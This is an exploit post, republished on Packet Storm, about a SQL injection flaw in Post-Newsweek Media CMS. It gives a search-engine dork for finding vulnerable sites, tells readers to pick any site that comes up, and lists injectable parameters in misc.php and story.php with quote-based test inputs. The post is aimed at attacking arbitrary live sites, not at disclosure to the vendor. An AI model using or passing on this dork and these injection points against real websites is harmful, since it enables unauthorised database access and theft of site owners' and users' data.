Post-Newsweek Media CMS suffers from a remote SQL injection vulnerability.
5bf56b5de3bb5440ac2789625e71af361d3fe7d2f2082276208abe9770e10bcc
#(+)Exploit Title: Post-Newsweek Media CMS SQL Injection Vulnerability
#(+)Author : ^Xecuti0n3r
#(+) Date : 6.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecutioner()yahoo.com
#(+) dork : intext:© Post-Newsweek Media inurl:php?id=
#(+) Category : Web Apps [SQli]
____________________________________________________________________
____________________________________________________________________
Choose any site that comes up when you enter the dork "intext:© Post-Newsweek Media inurl:php?id=" on search engine
*SQL injection Vulnerability*
# [+]http://site.com/cms/misc.php?id='4
# [+]http://site.com/cms/misc.php?id=[SQLI]
# [+]http://site.com/cms/story.php?id='1050
# [+]http://site.com/cms/story.php?id=[SQLI]
# [+]http://site.com/cms/story.php?county=DCMilitaryEd&id='931
# [+]http://site.com/cms/story.php?county?id=[SQLI]
____________________________________________________________________
____________________________________________________________________
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed